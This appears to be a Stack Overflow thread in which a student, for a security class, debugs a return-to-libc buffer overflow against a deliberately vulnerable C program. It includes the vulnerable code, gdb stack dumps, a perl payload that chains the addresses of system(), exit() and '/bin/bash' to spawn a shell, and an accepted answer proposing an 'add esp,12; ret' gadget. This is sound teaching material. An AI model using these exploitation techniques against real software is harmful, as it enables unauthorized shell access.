# Writing a Return-to-libc attack, but cannot get it to work correctly?

Tags: c, assembly, memory, stack-overflow

I need to perform a return on libc attack on `is_virus()` for a security class. The objective is to overflow `traffic[]` and overwrite the return address of `is_virus()` so that it returns to the libc function `system()` to open a shell. Now I have been spending hours on this and cannot get it to work.

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h> 
#include <unistd.h>
#include <time.h>
#include <ctype.h>

char *signatures[] = {"sys_open_ports", "sys_module", "write_binaries", 
"sys_binaries"};

int is_virus(int argc, char ** argv)
{
    char traffic[44];
    int i, j, k, len;

    traffic[0] = 0;
    for (i = 1; i < argc; ++i)
            strcat(traffic, argv[i]);

    for (j = 0; j < 4; ++j) {
            len = strlen(signatures[j]);
            for (i = 0; i < (int)strlen(traffic); ++i)
                    if (strncmp(signatures[j], traffic+i, len) == 0)
                            return 1;
    }

    return 0;
}

int main(int argc, char ** argv)
{
    if (argc < 2) {
            system("echo 'usage: target3 network_traffic_packets'");
            exit(1);
    }

    if (is_virus(argc, argv))
            printf("Alarm! virus founded\n");
    else
            printf("safe.\n");

    return 0;
 }
```

Now I began by finding the addresses of `system()`, `exit()`, and the string `/bin/bash`.

I found these to be...

system() = 0x40071584
 exit() = 0x400533a4
 "/bin/bash" = 0xbffffefb This was found inside environmental variables

Now from my understanding, The return address of `is_virus()` needs to be replaced with the address of `system()` followed the address of `exit()`, and then the address of the string `/bin/bash`. Next, I located the return address of `is_virus()` by disassembling `main` inside gdb.

```
...
0x804868b <main+43>:    pushl  0xc(%ebp)
0x804868e <main+46>:    pushl  0x8(%ebp)
0x8048691 <main+49>:    call   0x8048570 <is_virus>
0x8048696 <main+54>:    add    $0x10,%esp
0x8048699 <main+57>:    mov    %eax,%eax
...
```

So `is_virus()` should return to the address 0x8048696. I used this to determine how much padding I will need. Looking at memory shortly after the stack pointer...

```
Breakpoint 1, is_virus (argc=2, argv=0xbffffb34) at target3.c:15
15              traffic[0] = 0;
(gdb) x/32xw $esp
0xbffffa60:     0xbffffaa0      0x4000d2b6      0x40016b34      0x40021298
0xbffffa70:     0x00000001      0x00000000      0x40021000      0x400212b8
0xbffffa80:     0xbffffac0      0x4000d2b6      0x08049840      0x080482cb
0xbffffa90:     0x4002d164      0x40158154      0x400168e4      0x4013d12e
0xbffffaa0:     0xbffffad8      0x4000d450      0xbffffac8      0x08048696
0xbffffab0:     0x00000002      0xbffffb34      0xbffffad8      0x08048551
0xbffffac0:     0x08049820      0x08049934      0xbffffb08      0x4003e507
0xbffffad0:     0x00000002      0xbffffb34      0xbffffb40      0x080483b2
```

As we can see the return address is at 0xbffffab2. Now playing with passing 'A's, I found 60 bytes gets me just before this address.

So with all the info I constructed the input

> ./target3 $(perl -e 'print "AAAA"x15, "\x84\x15\x07\x40", "\xa4\x33\x05\x40", "\xfb\xfe\xff\xbf"')

And looking at data after `strcpy()` it looks correct.

```
(gdb) x/32xw $esp
0xbffffa20:     0xbffffa60      0x4000d2b6      0x40016b34      0x00000001
0xbffffa30:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffa40:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffa50:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffa60:     0x41414141      0x41414141      0x41414141      0x40071584
0xbffffa70:     0x400533a4      0xbffffefb      0xbffffa00      0x08048551
0xbffffa80:     0x08049820      0x08049934      0xbffffac8      0x4003e507
0xbffffa90:     0x00000002      0xbffffaf4      0xbffffb00      0x080483b2
```

But the issue is that the `exit()` address overwrites where `argc`'s value is stored and causes the fist loop executes more than once and crashes. Ive tried changing this value to 0xFFFFFFFF and forgetting about the clean exit, but as the function `is_virus()` tries to return, I get the error

> Cannot access memory at address 0xffffffff

Any help would be appreciated!

Comment: I'm not a security expert. But could you write the opcodes to `call system` with your parameters into the buffer itself? Then overwrite the return address to point into your buffer. A no-op slide might be useful -- you wouldn't have to guess the *exact* offset. This assumes you can execute code from your buffer. Which might not work.

Comment: Although I admit I don't know how to write a 0 into the buffer using strcat.

Comment: All code is stored in a different memory segment than the stack and buffer overflows can only modify stack space.

Comment: From that first stack view I would say the return address is at `0xbffffab0-4` (next line starts at `0xbffffab0` and I see the return address as last dword at previous line, thus -4 from next line address) = `0xbffffaac` ... but you did write `0xbffffab2`? What am I missing? BTW, the C code is intentionally compiled in debug mode, to keep all that stack frame code stable, and no inlining, etc, right? (can you optionally add command line to build it?)

Comment: Benjamin: the question of MFisherKDX is, if you can execute stack space as code, so you can then store payload there, but it looks like stack address is randomized every run (two different stack views), and true return-to-code attack shouldn't need to execute payload itself, the code to run should be cherry-picked from the actual app code, so the answer is probably "no" to stack execution. My another question is, whether this is supposed to be simple, like just calling the entry points of functions, or you are expected to decompile libc code and actually build the real attack from the tails...

Comment: @MFisherKDX if you can execute stack content, you don't need direct zero byte in payload, as you can easily create zero by code in payload and overwrite itself at the early stage of execution, like `xor cl,cl` `mov [cs:eip-15],cl` `jmp $-40`  (modify some opcode, and then jump to the adjusted code). And any other accidental zero in opcodes itself can be avoided by alternative way of coding the payload. But the "return-to" type of attack is used when the stack is "no exec", so you can't put code there directly, you just prepare chaining "return addresses" executing the code of app to work for u

Comment: @MFisherKDX: These days, it's possible (and done in practice) for programs to have no memory pages that both writeable and executable, only R+X or R+W.  Non-executable stack memory is a basic first step in hardening, but it's also possible to eliminate RWX everywhere else in some cases.  But if you can find some useful machine code in a library anywhere, you can try to arrange to return to it with some useful data on the stack + in registers.

Comment: @Ped7g: IDK how people go about looking for useful places to return to in `libc` machine code.  With a stack-args calling convention (like 32-bit code), if you control stack memory including the return address and beyond, you might be able to just use function entry points.  With register-args calling conventions, you're dependent on the potentially-vulnerable code to reload the arg-passing registers for its internal use from stack memory you control, I guess.  Or indirectly mess up its parent by clobbering saved call-preserved registers on the stack...

Comment: ...   Maybe you'd look for past-the-prologue points in library functions, especially if they spill / reload before making useful system calls.  You control the stack, so if you jump to the reload...  but only if the right values are in other registers.  Sounds hard.

Comment: @PeterCordes I think even in 32b stack args the `libc` code may contain enough trailing code ahead of each `ret` to build something up out of it, as the `libc` is quite some hefty code size, but if I would ever want to write payload like this, I would very likely use some SW heuristic on the `libc` opcodes to collect all possible trailings and what they can modify/do, then I would use that as new set of instructions to code my attack. Overall the whole idea of attacking somebody is so foreign to me, that I don't care if I miss some small details, understanding principle is enough for me.

Answer (score 3, accepted):

As I noted in comment, the first stack view shows return address at `0xbffffaac`, not `0xbffffab2`. But that does not matter, as you found out correct padding by experiment. BTW, if would probably help more to target your attack knowingly by running `./target3 ABC` and breakpointing at second `for` of `is_virus(...)`, so you would have exact idea where did the `"ABC"` land into `traffic` buffer.

Also there's no such thing as `system()` in libc. It is [`int system(const char *cmd);`](http://www.delorie.com/djgpp/doc/libc/libc_802.html) (according to the link), and `exit()` is [`void exit(int exit_code);`](http://www.delorie.com/djgpp/doc/libc/libc_298.html), at least put "..." into that parentheses, so readers don't have to think if it's really void argument call, or just shortened form.

<sub>disclaimer: any asm in this answer is Intel syntax, because I can't bother with AT&T, but as the answer doesn't contain any serious code, it shouldn't really matter, thing like `add esp,12` vs `addl $12,%esp` is hopefully easy to understand.</sub>

So to "return to libc to system(...)" in a way to emulate:

```c
{
    system("/bin/bash");
    exit(<anything>);
}
```

You want to have at stack the thing you tried to put there:

```lisp
0x40071584  ; system() address to return to
0x400533a4  ; exit() address as new return for system()
0xbffffefb  ; "/bin/bash" string (and "return" for exit())
<anything>  ; exit code for exit()
```

So far, so good.

Your problem is, as you figured out, that `0x400533a4` `exit()` address acts as new `argc` value, ruining the run of first loop.

So how about building stack like this:

```lisp
<magic>
<neg_value> ; any negative value to be used as new argc
0x40071584  ; system() address to return to
0x400533a4  ; exit() address as new return for system()
0xbffffefb  ; "/bin/bash" string (and "return" for exit())
<anything>  ; exit code for exit()
```

And the `<magic>` is address of libc code, which will effectively do:

```lisp
add esp,4   ; or "pop anything"
ret
```

At my machine with statically linked libc into your example C file I can see near the `system()` entry point this machine code (didn't bother to search for the exact match):

```lisp
<system()+0x27>:
    add esp,12
    movzx eax,al
    ret
```

Looks "good-enough" to me to be abused. By putting there some more padding and starting with my new return address like:

```lisp
<system+0x27>  ; add esp,12 + ret
<neg_value> ; any negative value to be used as new argc
<junk1>     ; to make 12 bytes junk in stack
<junk2>     ; to make 12 bytes junk in stack
0x40071584  ; system() address to return to
0x400533a4  ; exit() address as new return for system()
0xbffffefb  ; "/bin/bash" string (and "return" for exit())
<anything>  ; exit code for exit()
```

I think I would achieve the call sequence you want (or rather to say the "ret sequence" :) ).

Didn't verify, because I'm unable to compile the original C in such plain way to make the stack overflow work + to have static libc addresses, on my main system it adds lot of cruft around + stack check (which I managed to switch off, but still I have completely different addresses of libc functions and stack, not resembling your values).

But I think this is the approach true to the nature of "return to" type of attack payload building, so it should give you idea how to proceed further. GL, HF. :)

Comment: It's totally standard to write `foo()` when writing in English about a function called `foo`.  Your objection is silly, and so is your suggestion to write `system(...)`.

Comment: @PeterCordes the problem is, that it confused me enough to first think about bug, which didn't exist. At first I though the stack by OP is set incorrectly, because it should have been `system, ptr "/bin/bash", exit` (which would work as argc!) and he misplaced the `system` argument. But after getting deeper into it, I realized my own mistake, still the first part of answer was already there, and I didn't rewrote it. Maybe silly, but that's what I prefer, for me the "void" vs "some arguments" is important and I don't like to recall things from memory much (i.e. arguments for libc functions).